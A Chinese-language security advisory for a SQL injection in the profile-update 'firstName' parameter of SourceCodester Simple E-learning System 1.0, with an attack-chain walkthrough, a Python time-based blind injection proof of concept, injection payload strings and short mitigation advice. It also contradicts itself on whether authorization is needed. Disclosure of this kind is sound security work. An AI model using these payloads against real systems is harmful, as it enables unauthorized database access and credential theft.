CVE-2026-4574 CVSS 6.3 中危

CVE-2026-4574: SourceCodester学习系统SQL注入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4574

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple E-learning System

漏洞概述

SourceCodester Simple E-learning System 1.0在用户资料更新处理组件中存在安全漏洞。由于对用户输入的'firstName'参数缺乏适当的过滤或验证，导致攻击者可以通过构造恶意SQL语句实施SQL注入攻击。该漏洞允许攻击者在未授权的情况下远程利用，可能导致数据库信息泄露、数据篡改或服务器权限提升，对系统的机密性、完整性和可用性构成威胁。

技术细节

该漏洞属于典型的SQL注入漏洞，位于SourceCodester Simple E-learning System 1.0的用户资料更新处理程序中。当用户尝试更新个人资料时，后端代码直接将前端传递的`firstName`参数拼接到SQL查询语句中，而未进行任何输入清理或使用参数化查询。攻击者利用此漏洞，可以在`firstName`字段中注入恶意的SQL载荷（如`' OR '1'='1`或联合查询载荷）。由于CVSS向量为AV:N/AC:L/PR:L/UI:N/S:U，攻击者仅需拥有低权限账户即可通过网络发起攻击，无需用户交互。成功利用后，攻击者可以绕过认证限制，提取敏感数据库内容（如管理员凭证），或对数据进行修改和删除。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统为SourceCodester Simple E-learning System，并确定其版本为1.0。

STEP 2

步骤2：获取访问权限

攻击者注册或获取一个低权限的用户账户，因为漏洞利用需要低权限（PR:L）。

STEP 3

步骤3：漏洞利用

攻击者登录系统，访问User Profile Update功能，拦截请求并在'firstName'参数中注入恶意SQL代码。

STEP 4

步骤4：数据窃取与控制

利用注入点执行SQL命令，读取数据库敏感信息（如管理员密码），进一步提升权限或控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example, needs to be adjusted based on actual endpoint)
url = "http://target.com/simple_elearning/update_profile"

# Attacker session cookie (Low privilege user required)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Payload to test SQL injection in 'firstName' parameter
# Example: Checking if the database sleeps for 5 seconds
payload = "test' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"

data = {
    "firstName": payload,
    "lastName": "User",
    "submit": "Update"
}

response = requests.post(url, data=data, cookies=cookies)

if response.elapsed.total_seconds() > 5:
    print("[+] Vulnerability confirmed: SQL Injection detected via response time.")
else:
    print("[-] Vulnerability not detected or payload incorrect.")

影响范围

SourceCodester Simple E-learning System 1.0

防御指南

临时缓解措施

建议管理员立即检查并限制系统的外部访问，并在User Profile Update接口处实施严格的输入过滤规则。同时，应密切关注官方发布的补丁更新，一旦可用立即进行升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4574
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4574
3 Details https://www.cvedetails.com/cve/CVE-2026-4574/
4 VulDB https://vuldb.com/cve/CVE-2026-4574
5 Link https://github.com/meifukun/Web-Security-PoCs/blob/main/Simple-E-learning-System/SQLi-UserProfile-firstName.md
6 Link https://vuldb.com/?ctiid.352411
7 Link https://vuldb.com/?id.352411
8 Link https://vuldb.com/?submit.775182
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表